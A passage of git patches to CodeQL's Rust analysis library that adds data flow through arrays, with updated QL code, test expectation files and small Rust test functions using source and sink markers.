variables.rs:535:11:569:1 | { ... } | | +| variables.rs:568:5:568:30 | ExprStmt | variables.rs:568:5:568:27 | ref_methodcall_receiver | | breakTarget continueTarget diff --git a/rust/ql/test/library-tests/variables/Ssa.expected b/rust/ql/test/library-tests/variables/Ssa.expected index ac6ec176a29..2898dac871e 100644 --- a/rust/ql/test/library-tests/variables/Ssa.expected +++ b/rust/ql/test/library-tests/variables/Ssa.expected @@ -6,7 +6,7 @@ nonSsaVariable | variables.rs:392:13:392:13 | x | | variables.rs:426:13:426:13 | z | | variables.rs:492:13:492:13 | a | -| variables.rs:520:11:520:11 | a | +| variables.rs:529:11:529:11 | a | definition | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | @@ -136,9 +136,12 @@ definition | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | -| variables.rs:501:9:501:9 | x | variables.rs:501:9:501:9 | x | -| variables.rs:505:9:505:9 | z | variables.rs:505:9:505:9 | z | -| variables.rs:514:10:514:18 | SelfParam | variables.rs:514:15:514:18 | self | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | +| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | +| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | +| variables.rs:514:9:514:9 | z | variables.rs:514:9:514:9 | z | +| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | read | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | variables.rs:4:20:4:20 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | variables.rs:8:20:8:20 | i | @@ -262,8 +265,11 @@ read | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:472:19:472:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:9 | x | variables.rs:501:9:501:9 | x | variables.rs:503:15:503:15 | x | -| variables.rs:514:10:514:18 | SelfParam | variables.rs:514:15:514:18 | self | variables.rs:515:6:515:9 | self | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | +| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | +| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | +| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | firstRead | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | variables.rs:4:20:4:20 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | variables.rs:8:20:8:20 | i | @@ -364,8 +370,11 @@ firstRead | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:466:19:466:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:9 | x | variables.rs:501:9:501:9 | x | variables.rs:503:15:503:15 | x | -| variables.rs:514:10:514:18 | SelfParam | variables.rs:514:15:514:18 | self | variables.rs:515:6:515:9 | self | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | +| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | +| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | +| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | lastRead | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | variables.rs:4:20:4:20 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | variables.rs:8:20:8:20 | i | @@ -467,8 +476,11 @@ lastRead | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:472:19:472:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:9 | x | variables.rs:501:9:501:9 | x | variables.rs:503:15:503:15 | x | -| variables.rs:514:10:514:18 | SelfParam | variables.rs:514:15:514:18 | self | variables.rs:515:6:515:9 | self | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | +| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | +| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | +| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | adjacentReads | variables.rs:35:9:35:10 | x3 | variables.rs:35:9:35:10 | x3 | variables.rs:36:15:36:16 | x3 | variables.rs:38:9:38:10 | x3 | | variables.rs:43:9:43:10 | x4 | variables.rs:43:9:43:10 | x4 | variables.rs:44:15:44:16 | x4 | variables.rs:49:15:49:16 | x4 | @@ -571,3 +583,4 @@ assigns | variables.rs:438:9:438:9 | i | variables.rs:438:13:438:13 | 1 | | variables.rs:450:9:450:9 | x | variables.rs:450:13:450:13 | 2 | | variables.rs:454:9:454:9 | x | variables.rs:454:13:454:13 | 3 | +| variables.rs:505:5:505:5 | a | variables.rs:505:9:505:17 | [...] | diff --git a/rust/ql/test/library-tests/variables/variables.expected b/rust/ql/test/library-tests/variables/variables.expected index 9abee1df82e..7d83ec1fbc5 100644 --- a/rust/ql/test/library-tests/variables/variables.expected +++ b/rust/ql/test/library-tests/variables/variables.expected @@ -1,4 +1,6 @@ testFailures +| variables.rs:503:5:503:5 | a | Unexpected result: write_access=a | +| variables.rs:503:15:503:32 | //... | Missing result: read_access=a | failures variable | variables.rs:3:14:3:14 | s | @@ -98,10 +100,11 @@ variable | variables.rs:482:20:482:23 | self | | variables.rs:486:11:486:14 | self | | variables.rs:492:13:492:13 | a | -| variables.rs:501:9:501:9 | x | -| variables.rs:505:9:505:9 | z | -| variables.rs:514:15:514:18 | self | -| variables.rs:520:11:520:11 | a | +| variables.rs:501:13:501:13 | a | +| variables.rs:510:9:510:9 | x | +| variables.rs:514:9:514:9 | z | +| variables.rs:523:15:523:18 | self | +| variables.rs:529:11:529:11 | a | variableAccess | variables.rs:4:20:4:20 | s | variables.rs:3:14:3:14 | s | | variables.rs:8:20:8:20 | i | variables.rs:7:14:7:14 | i | @@ -256,12 +259,17 @@ variableAccess | variables.rs:495:15:495:15 | a | variables.rs:492:13:492:13 | a | | variables.rs:496:5:496:5 | a | variables.rs:492:13:492:13 | a | | variables.rs:497:15:497:15 | a | variables.rs:492:13:492:13 | a | -| variables.rs:502:20:502:20 | x | variables.rs:501:9:501:9 | x | -| variables.rs:503:15:503:15 | x | variables.rs:501:9:501:9 | x | -| variables.rs:506:20:506:20 | z | variables.rs:505:9:505:9 | z | -| variables.rs:515:6:515:9 | self | variables.rs:514:15:514:18 | self | -| variables.rs:521:3:521:3 | a | variables.rs:520:11:520:11 | a | -| variables.rs:523:13:523:13 | a | variables.rs:520:11:520:11 | a | +| variables.rs:502:15:502:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | +| variables.rs:504:15:504:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | +| variables.rs:506:15:506:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:511:20:511:20 | x | variables.rs:510:9:510:9 | x | +| variables.rs:512:15:512:15 | x | variables.rs:510:9:510:9 | x | +| variables.rs:515:20:515:20 | z | variables.rs:514:9:514:9 | z | +| variables.rs:524:6:524:9 | self | variables.rs:523:15:523:18 | self | +| variables.rs:530:3:530:3 | a | variables.rs:529:11:529:11 | a | +| variables.rs:532:13:532:13 | a | variables.rs:529:11:529:11 | a | variableWriteAccess | variables.rs:23:5:23:6 | x2 | variables.rs:21:13:21:14 | x2 | | variables.rs:30:5:30:5 | x | variables.rs:28:13:28:13 | x | @@ -273,6 +281,8 @@ variableWriteAccess | variables.rs:450:9:450:9 | x | variables.rs:446:13:446:13 | x | | variables.rs:454:9:454:9 | x | variables.rs:446:13:446:13 | x | | variables.rs:496:5:496:5 | a | variables.rs:492:13:492:13 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | +| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variableReadAccess | variables.rs:4:20:4:20 | s | variables.rs:3:14:3:14 | s | | variables.rs:8:20:8:20 | i | variables.rs:7:14:7:14 | i | @@ -408,10 +418,13 @@ variableReadAccess | variables.rs:494:5:494:5 | a | variables.rs:492:13:492:13 | a | | variables.rs:495:15:495:15 | a | variables.rs:492:13:492:13 | a | | variables.rs:497:15:497:15 | a | variables.rs:492:13:492:13 | a | -| variables.rs:503:15:503:15 | x | variables.rs:501:9:501:9 | x | -| variables.rs:515:6:515:9 | self | variables.rs:514:15:514:18 | self | -| variables.rs:521:3:521:3 | a | variables.rs:520:11:520:11 | a | -| variables.rs:523:13:523:13 | a | variables.rs:520:11:520:11 | a | +| variables.rs:502:15:502:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:504:15:504:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:506:15:506:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:512:15:512:15 | x | variables.rs:510:9:510:9 | x | +| variables.rs:524:6:524:9 | self | variables.rs:523:15:523:18 | self | +| variables.rs:530:3:530:3 | a | variables.rs:529:11:529:11 | a | +| variables.rs:532:13:532:13 | a | variables.rs:529:11:529:11 | a | variableInitializer | variables.rs:16:9:16:10 | x1 | variables.rs:16:14:16:16 | "a" | | variables.rs:21:13:21:14 | x2 | variables.rs:21:18:21:18 | 4 | @@ -460,9 +473,10 @@ variableInitializer | variables.rs:446:13:446:13 | x | variables.rs:446:17:446:17 | 1 | | variables.rs:462:9:462:9 | x | variables.rs:462:13:462:13 | 1 | | variables.rs:492:13:492:13 | a | variables.rs:492:17:492:35 | MyStruct {...} | -| variables.rs:501:9:501:9 | x | variables.rs:501:13:501:14 | 16 | -| variables.rs:505:9:505:9 | z | variables.rs:505:13:505:14 | 17 | -| variables.rs:520:11:520:11 | a | variables.rs:520:15:520:33 | MyStruct {...} | +| variables.rs:501:13:501:13 | a | variables.rs:501:17:501:25 | [...] | +| variables.rs:510:9:510:9 | x | variables.rs:510:13:510:14 | 16 | +| variables.rs:514:9:514:9 | z | variables.rs:514:13:514:14 | 17 | +| variables.rs:529:11:529:11 | a | variables.rs:529:15:529:33 | MyStruct {...} | capturedVariable | variables.rs:400:9:400:9 | x | | variables.rs:410:13:410:13 | x | diff --git a/rust/ql/test/library-tests/variables/variables.rs b/rust/ql/test/library-tests/variables/variables.rs index 4bab6d12aea..61bd3d72002 100644 --- a/rust/ql/test/library-tests/variables/variables.rs +++ b/rust/ql/test/library-tests/variables/variables.rs @@ -497,6 +497,15 @@ fn structs() { print_i64(a.my_get()); // $ read_access=a } +fn arrays() { + let mut a = [1, 2, 3]; // a + print_i64(a[0]); // $ read_access=a + a[1] = 5; // $ read_access=a + print_i64(a[1]); // $ read_access=a + a = [4, 5, 6]; // $ write_access=a + print_i64(a[2]); // $ read_access=a +} + fn ref_arg() { let x = 16; // x print_i64_ref(&x); // $ access=x From cac4514eae6d1072c771f76aedee2e8842309dac Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Tue, 3 Dec 2024 13:56:55 +0100 Subject: [PATCH 0778/1267] Rust: Add basic data flow through arrays --- .../rust/dataflow/internal/DataFlowImpl.qll | 44 ++++++++++++- .../rust/elements/internal/VariableImpl.qll | 3 +- .../dataflow/local/DataFlowStep.expected | 40 +++++++++++- .../dataflow/local/inline-flow.expected | 65 +++++++++++++++++++ .../test/library-tests/dataflow/local/main.rs | 16 ++--- .../test/library-tests/variables/Ssa.expected | 10 +-- .../variables/variables.expected | 4 +- 7 files changed, 162 insertions(+), 20 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index a474d778e4e..0246af05bcd 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -623,6 +623,15 @@ private class StructFieldContent extends Content, TStructFieldContent { override string toString() { result = s.toString() + "." + field_.toString() } } +/** + * Content stored at an element in an array. + */ +final private class ArrayElementContent extends VariantContent, TArrayElement { + ArrayElementContent() { this = TArrayElement() } + + override string toString() { result = "array[]" } +} + /** * Content stored at a position in a tuple. * @@ -884,6 +893,24 @@ module RustDataFlow implements InputSig { node1.asExpr() = access.getExpr() and node2.asExpr() = access ) + or + exists(IndexExprCfgNode arr | + c instanceof ArrayElementContent and + node1.asExpr() = arr.getBase() and + node2.asExpr() = arr + ) + or + exists(ForExprCfgNode for | + c instanceof ArrayElementContent and + node1.asExpr() = for.getIterable() and + node2.asPat() = for.getPat() + ) + or + exists(SlicePatCfgNode pat | + c instanceof ArrayElementContent and + node1.asPat() = pat and + node2.asPat() = pat.getAPat() + ) ) or FlowSummaryImpl::Private::Steps::summaryReadStep(node1.(Node::FlowSummaryNode).getSummaryNode(), @@ -950,7 +977,20 @@ module RustDataFlow implements InputSig { node2.asExpr() = tuple ) or + exists(ArrayExprCfgNode arr | + c instanceof ArrayElementContent and + node1.asExpr() = arr.getAnExpr() and + node2.asExpr() = arr + ) + or tupleAssignment(node1, node2.(PostUpdateNode).getPreUpdateNode(), c) + or + exists(AssignmentExprCfgNode assignment, IndexExprCfgNode index | + c instanceof ArrayElementContent and + assignment.getLhs() = index and + node1.asExpr() = assignment.getRhs() and + node2.(PostUpdateNode).getPreUpdateNode().asExpr() = index.getBase() + ) ) or FlowSummaryImpl::Private::Steps::summaryStoreStep(node1.(Node::FlowSummaryNode).getSummaryNode(), @@ -1050,7 +1090,8 @@ private module Cached { TSourceParameterNode(ParamBaseCfgNode p) or TPatNode(PatCfgNode p) or TExprPostUpdateNode(ExprCfgNode e) { - isArgumentForCall(e, _, _) or e = any(FieldExprCfgNode access).getExpr() + isArgumentForCall(e, _, _) or + e = [any(IndexExprCfgNode i).getBase(), any(FieldExprCfgNode access).getExpr()] } or TSsaNode(SsaImpl::DataFlowIntegration::SsaNode node) or TFlowSummaryNode(FlowSummaryImpl::Private::SummaryNode sn) @@ -1135,6 +1176,7 @@ private module Cached { TVariantFieldContent(VariantCanonicalPath v, string field) { field = v.getVariant().getFieldList().(RecordFieldList).getAField().getName().getText() } or + TArrayElement() or TTuplePositionContent(int pos) { pos in [0 .. max([ any(TuplePat pat).getNumberOfFields(), diff --git a/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll index a9758c455b9..622e72c5e3e 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll @@ -467,7 +467,8 @@ module Impl { assignmentExprDescendant(mid) and getImmediateParent(e) = mid and not mid.(PrefixExpr).getOperatorName() = "*" and - not mid instanceof FieldExpr + not mid instanceof FieldExpr and + not mid instanceof IndexExpr ) } diff --git a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected index 6828fdf9b7e..edea0cc27ec 100644 --- a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected @@ -388,11 +388,14 @@ localStep | main.rs:351:9:351:19 | [SSA] mut_arr | main.rs:352:10:352:16 | mut_arr | | main.rs:351:9:351:19 | mut_arr | main.rs:351:9:351:19 | [SSA] mut_arr | | main.rs:351:23:351:31 | [...] | main.rs:351:9:351:19 | mut_arr | -| main.rs:354:5:354:11 | [SSA] mut_arr | main.rs:355:13:355:19 | mut_arr | -| main.rs:354:5:354:11 | mut_arr | main.rs:354:5:354:11 | [SSA] mut_arr | +| main.rs:352:10:352:16 | [post] mut_arr | main.rs:354:5:354:11 | mut_arr | +| main.rs:352:10:352:16 | mut_arr | main.rs:354:5:354:11 | mut_arr | +| main.rs:354:5:354:11 | [post] mut_arr | main.rs:355:13:355:19 | mut_arr | +| main.rs:354:5:354:11 | mut_arr | main.rs:355:13:355:19 | mut_arr | | main.rs:354:18:354:27 | source(...) | main.rs:354:5:354:14 | mut_arr[1] | | main.rs:355:9:355:9 | [SSA] d | main.rs:356:10:356:10 | d | | main.rs:355:9:355:9 | d | main.rs:355:9:355:9 | [SSA] d | +| main.rs:355:13:355:19 | [post] mut_arr | main.rs:357:10:357:16 | mut_arr | | main.rs:355:13:355:19 | mut_arr | main.rs:357:10:357:16 | mut_arr | | main.rs:355:13:355:22 | mut_arr[1] | main.rs:355:9:355:9 | d | storeStep @@ -436,6 +439,27 @@ storeStep | main.rs:276:41:276:41 | 2 | D | main.rs:276:14:276:43 | ...::D {...} | | main.rs:294:18:294:27 | source(...) | C | main.rs:293:14:295:5 | C {...} | | main.rs:296:27:296:27 | 2 | D | main.rs:296:14:296:29 | D {...} | +| main.rs:314:17:314:17 | 1 | array[] | main.rs:314:16:314:33 | [...] | +| main.rs:314:20:314:20 | 2 | array[] | main.rs:314:16:314:33 | [...] | +| main.rs:314:23:314:32 | source(...) | array[] | main.rs:314:16:314:33 | [...] | +| main.rs:318:17:318:26 | source(...) | array[] | main.rs:318:16:318:31 | [...] | +| main.rs:318:29:318:30 | 10 | array[] | main.rs:318:16:318:31 | [...] | +| main.rs:322:17:322:17 | 1 | array[] | main.rs:322:16:322:24 | [...] | +| main.rs:322:20:322:20 | 2 | array[] | main.rs:322:16:322:24 | [...] | +| main.rs:322:23:322:23 | 3 | array[] | main.rs:322:16:322:24 | [...] | +| main.rs:328:17:328:17 | 1 | array[] | main.rs:328:16:328:33 | [...] | +| main.rs:328:20:328:20 | 2 | array[] | main.rs:328:16:328:33 | [...] | +| main.rs:328:23:328:32 | source(...) | array[] | main.rs:328:16:328:33 | [...] | +| main.rs:333:17:333:17 | 1 | array[] | main.rs:333:16:333:24 | [...] | +| main.rs:333:20:333:20 | 2 | array[] | main.rs:333:16:333:24 | [...] | +| main.rs:333:23:333:23 | 3 | array[] | main.rs:333:16:333:24 | [...] | +| main.rs:340:17:340:17 | 1 | array[] | main.rs:340:16:340:33 | [...] | +| main.rs:340:20:340:20 | 2 | array[] | main.rs:340:16:340:33 | [...] | +| main.rs:340:23:340:32 | source(...) | array[] | main.rs:340:16:340:33 | [...] | +| main.rs:351:24:351:24 | 1 | array[] | main.rs:351:23:351:31 | [...] | +| main.rs:351:27:351:27 | 2 | array[] | main.rs:351:23:351:31 | [...] | +| main.rs:351:30:351:30 | 3 | array[] | main.rs:351:23:351:31 | [...] | +| main.rs:354:18:354:27 | source(...) | array[] | main.rs:354:5:354:11 | [post] mut_arr | | main.rs:364:27:364:27 | 0 | Some | main.rs:364:22:364:28 | Some(...) | readStep | file://:0:0:0:0 | [summary param] self in lang:core::_::::unwrap | Some | file://:0:0:0:0 | [summary] read: Argument[self].Variant[crate::option::Option::Some(0)] in lang:core::_::::unwrap | @@ -484,3 +508,15 @@ readStep | main.rs:302:28:302:43 | D {...} | D | main.rs:302:41:302:41 | n | | main.rs:305:9:305:24 | C {...} | C | main.rs:305:22:305:22 | n | | main.rs:306:9:306:24 | D {...} | D | main.rs:306:22:306:22 | n | +| main.rs:315:14:315:17 | arr1 | array[] | main.rs:315:14:315:20 | arr1[2] | +| main.rs:319:14:319:17 | arr2 | array[] | main.rs:319:14:319:20 | arr2[4] | +| main.rs:323:14:323:17 | arr3 | array[] | main.rs:323:14:323:20 | arr3[2] | +| main.rs:329:15:329:18 | arr1 | array[] | main.rs:329:9:329:10 | n1 | +| main.rs:334:15:334:18 | arr2 | array[] | main.rs:334:9:334:10 | n2 | +| main.rs:342:9:342:17 | SlicePat | array[] | main.rs:342:10:342:10 | a | +| main.rs:342:9:342:17 | SlicePat | array[] | main.rs:342:13:342:13 | b | +| main.rs:342:9:342:17 | SlicePat | array[] | main.rs:342:16:342:16 | c | +| main.rs:352:10:352:16 | mut_arr | array[] | main.rs:352:10:352:19 | mut_arr[1] | +| main.rs:354:5:354:11 | mut_arr | array[] | main.rs:354:5:354:14 | mut_arr[1] | +| main.rs:355:13:355:19 | mut_arr | array[] | main.rs:355:13:355:22 | mut_arr[1] | +| main.rs:357:10:357:16 | mut_arr | array[] | main.rs:357:10:357:19 | mut_arr[0] | diff --git a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected index ed51d66a1ad..9051630f5c4 100644 --- a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected @@ -64,6 +64,32 @@ edges | main.rs:298:22:298:22 | n | main.rs:298:34:298:34 | n | provenance | | | main.rs:302:9:302:24 | C {...} [C] | main.rs:302:22:302:22 | n | provenance | | | main.rs:302:22:302:22 | n | main.rs:302:53:302:53 | n | provenance | | +| main.rs:314:16:314:33 | [...] [array[]] | main.rs:315:14:315:17 | arr1 [array[]] | provenance | | +| main.rs:314:23:314:32 | source(...) | main.rs:314:16:314:33 | [...] [array[]] | provenance | | +| main.rs:315:14:315:17 | arr1 [array[]] | main.rs:315:14:315:20 | arr1[2] | provenance | | +| main.rs:315:14:315:20 | arr1[2] | main.rs:316:10:316:11 | n1 | provenance | | +| main.rs:318:16:318:31 | [...] [array[]] | main.rs:319:14:319:17 | arr2 [array[]] | provenance | | +| main.rs:318:17:318:26 | source(...) | main.rs:318:16:318:31 | [...] [array[]] | provenance | | +| main.rs:319:14:319:17 | arr2 [array[]] | main.rs:319:14:319:20 | arr2[4] | provenance | | +| main.rs:319:14:319:20 | arr2[4] | main.rs:320:10:320:11 | n2 | provenance | | +| main.rs:328:16:328:33 | [...] [array[]] | main.rs:329:15:329:18 | arr1 [array[]] | provenance | | +| main.rs:328:23:328:32 | source(...) | main.rs:328:16:328:33 | [...] [array[]] | provenance | | +| main.rs:329:9:329:10 | n1 | main.rs:330:14:330:15 | n1 | provenance | | +| main.rs:329:15:329:18 | arr1 [array[]] | main.rs:329:9:329:10 | n1 | provenance | | +| main.rs:340:16:340:33 | [...] [array[]] | main.rs:342:9:342:17 | SlicePat [array[]] | provenance | | +| main.rs:340:23:340:32 | source(...) | main.rs:340:16:340:33 | [...] [array[]] | provenance | | +| main.rs:342:9:342:17 | SlicePat [array[]] | main.rs:342:10:342:10 | a | provenance | | +| main.rs:342:9:342:17 | SlicePat [array[]] | main.rs:342:13:342:13 | b | provenance | | +| main.rs:342:9:342:17 | SlicePat [array[]] | main.rs:342:16:342:16 | c | provenance | | +| main.rs:342:10:342:10 | a | main.rs:343:18:343:18 | a | provenance | | +| main.rs:342:13:342:13 | b | main.rs:344:18:344:18 | b | provenance | | +| main.rs:342:16:342:16 | c | main.rs:345:18:345:18 | c | provenance | | +| main.rs:354:5:354:11 | [post] mut_arr [array[]] | main.rs:355:13:355:19 | mut_arr [array[]] | provenance | | +| main.rs:354:5:354:11 | [post] mut_arr [array[]] | main.rs:357:10:357:16 | mut_arr [array[]] | provenance | | +| main.rs:354:18:354:27 | source(...) | main.rs:354:5:354:11 | [post] mut_arr [array[]] | provenance | | +| main.rs:355:13:355:19 | mut_arr [array[]] | main.rs:355:13:355:22 | mut_arr[1] | provenance | | +| main.rs:355:13:355:22 | mut_arr[1] | main.rs:356:10:356:10 | d | provenance | | +| main.rs:357:10:357:16 | mut_arr [array[]] | main.rs:357:10:357:19 | mut_arr[0] | provenance | | nodes | main.rs:15:10:15:18 | source(...) | semmle.label | source(...) | | main.rs:19:13:19:21 | source(...) | semmle.label | source(...) | @@ -147,6 +173,37 @@ nodes | main.rs:302:9:302:24 | C {...} [C] | semmle.label | C {...} [C] | | main.rs:302:22:302:22 | n | semmle.label | n | | main.rs:302:53:302:53 | n | semmle.label | n | +| main.rs:314:16:314:33 | [...] [array[]] | semmle.label | [...] [array[]] | +| main.rs:314:23:314:32 | source(...) | semmle.label | source(...) | +| main.rs:315:14:315:17 | arr1 [array[]] | semmle.label | arr1 [array[]] | +| main.rs:315:14:315:20 | arr1[2] | semmle.label | arr1[2] | +| main.rs:316:10:316:11 | n1 | semmle.label | n1 | +| main.rs:318:16:318:31 | [...] [array[]] | semmle.label | [...] [array[]] | +| main.rs:318:17:318:26 | source(...) | semmle.label | source(...) | +| main.rs:319:14:319:17 | arr2 [array[]] | semmle.label | arr2 [array[]] | +| main.rs:319:14:319:20 | arr2[4] | semmle.label | arr2[4] | +| main.rs:320:10:320:11 | n2 | semmle.label | n2 | +| main.rs:328:16:328:33 | [...] [array[]] | semmle.label | [...] [array[]] | +| main.rs:328:23:328:32 | source(...) | semmle.label | source(...) | +| main.rs:329:9:329:10 | n1 | semmle.label | n1 | +| main.rs:329:15:329:18 | arr1 [array[]] | semmle.label | arr1 [array[]] | +| main.rs:330:14:330:15 | n1 | semmle.label | n1 | +| main.rs:340:16:340:33 | [...] [array[]] | semmle.label | [...] [array[]] | +| main.rs:340:23:340:32 | source(...) | semmle.label | source(...) | +| main.rs:342:9:342:17 | SlicePat [array[]] | semmle.label | SlicePat [array[]] | +| main.rs:342:10:342:10 | a | semmle.label | a | +| main.rs:342:13:342:13 | b | semmle.label | b | +| main.rs:342:16:342:16 | c | semmle.label | c | +| main.rs:343:18:343:18 | a | semmle.label | a | +| main.rs:344:18:344:18 | b | semmle.label | b | +| main.rs:345:18:345:18 | c | semmle.label | c | +| main.rs:354:5:354:11 | [post] mut_arr [array[]] | semmle.label | [post] mut_arr [array[]] | +| main.rs:354:18:354:27 | source(...) | semmle.label | source(...) | +| main.rs:355:13:355:19 | mut_arr [array[]] | semmle.label | mut_arr [array[]] | +| main.rs:355:13:355:22 | mut_arr[1] | semmle.label | mut_arr[1] | +| main.rs:356:10:356:10 | d | semmle.label | d | +| main.rs:357:10:357:16 | mut_arr [array[]] | semmle.label | mut_arr [array[]] | +| main.rs:357:10:357:19 | mut_arr[0] | semmle.label | mut_arr[0] | subpaths testFailures #select @@ -172,3 +229,11 @@ testFailures | main.rs:282:81:282:81 | n | main.rs:274:18:274:27 | source(...) | main.rs:282:81:282:81 | n | $@ | main.rs:274:18:274:27 | source(...) | source(...) | | main.rs:298:34:298:34 | n | main.rs:294:18:294:27 | source(...) | main.rs:298:34:298:34 | n | $@ | main.rs:294:18:294:27 | source(...) | source(...) | | main.rs:302:53:302:53 | n | main.rs:294:18:294:27 | source(...) | main.rs:302:53:302:53 | n | $@ | main.rs:294:18:294:27 | source(...) | source(...) | +| main.rs:316:10:316:11 | n1 | main.rs:314:23:314:32 | source(...) | main.rs:316:10:316:11 | n1 | $@ | main.rs:314:23:314:32 | source(...) | source(...) | +| main.rs:320:10:320:11 | n2 | main.rs:318:17:318:26 | source(...) | main.rs:320:10:320:11 | n2 | $@ | main.rs:318:17:318:26 | source(...) | source(...) | +| main.rs:330:14:330:15 | n1 | main.rs:328:23:328:32 | source(...) | main.rs:330:14:330:15 | n1 | $@ | main.rs:328:23:328:32 | source(...) | source(...) | +| main.rs:343:18:343:18 | a | main.rs:340:23:340:32 | source(...) | main.rs:343:18:343:18 | a | $@ | main.rs:340:23:340:32 | source(...) | source(...) | +| main.rs:344:18:344:18 | b | main.rs:340:23:340:32 | source(...) | main.rs:344:18:344:18 | b | $@ | main.rs:340:23:340:32 | source(...) | source(...) | +| main.rs:345:18:345:18 | c | main.rs:340:23:340:32 | source(...) | main.rs:345:18:345:18 | c | $@ | main.rs:340:23:340:32 | source(...) | source(...) | +| main.rs:356:10:356:10 | d | main.rs:354:18:354:27 | source(...) | main.rs:356:10:356:10 | d | $@ | main.rs:354:18:354:27 | source(...) | source(...) | +| main.rs:357:10:357:19 | mut_arr[0] | main.rs:354:18:354:27 | source(...) | main.rs:357:10:357:19 | mut_arr[0] | $@ | main.rs:354:18:354:27 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/local/main.rs b/rust/ql/test/library-tests/dataflow/local/main.rs index 05e0997e6ea..29d849eed54 100644 --- a/rust/ql/test/library-tests/dataflow/local/main.rs +++ b/rust/ql/test/library-tests/dataflow/local/main.rs @@ -313,11 +313,11 @@ fn custom_record_enum_pattern_match_unqualified() { fn array_lookup() { let arr1 = [1, 2, source(94)]; let n1 = arr1[2]; - sink(n1); // $ MISSING: hasValueFlow=94 + sink(n1); // $ hasValueFlow=94 let arr2 = [source(20); 10]; let n2 = arr2[4]; - sink(n2); // $ MISSING: hasValueFlow=20 